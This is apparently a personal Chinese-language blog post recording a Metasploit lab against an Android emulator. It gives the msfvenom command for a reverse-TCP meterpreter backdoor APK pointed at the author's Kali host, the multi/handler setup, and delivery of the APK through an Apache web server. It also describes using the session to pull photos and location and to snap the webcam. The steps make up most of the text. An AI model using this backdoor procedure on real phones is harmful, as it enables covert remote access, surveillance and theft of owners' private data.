记录一次MSF入侵安卓手机

首先将kali的网卡调节为桥接模式，使其与物理机可以ping通，在物理机开启一个安卓模拟器。

kali：10.115.28.98

命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=10.115.28.98 lport=5555 R>/home/czs/android_payload.apk

在kali端生成安卓后门

 开启msf

命令：msfconsole

use exploit/multi/handler使用此模块进行配置

show options

将其中的参数设置与第一条命令相同。

 

 

 

 OK，一切工作准备就绪，为了方便我直接将刚才生成的anroid_payload.apk文件放在var/www/hml目录下，并且开启apache2服务

命令

service apache2 start

 

 

因为手机与kali在一个局域网中，我们直接利用手机访问kali的ip地址即可下载apk后门

 

 我们进行安装

 

 此时在kali的msf中输入命令 ：run 并且在安卓模拟器点击刚下好的后门程序

---------------------------------------------------

诶这是第二天了，昨天在msf中usehandler模块时忘记修改默认的payload的了，所以导致我没成功

今天想起来了，并且换了一个模拟器 用的是鲁大师的手机模拟大师做的实验

 

 手机端运行后门程序 kali虚拟机相应进入了meterpreter

 

 再接着我们可以使用help查看命令进行自己想要的操作 比如进入DCIM下载手机的图片 查看定位信息等等

剩下的自己探索吧

 注：

 

 刚才调用了webcam_snap命令 那个模拟器我都没找到相机软件 不过kali直接传回了一个物理机的我的照片。。。。。。。惊！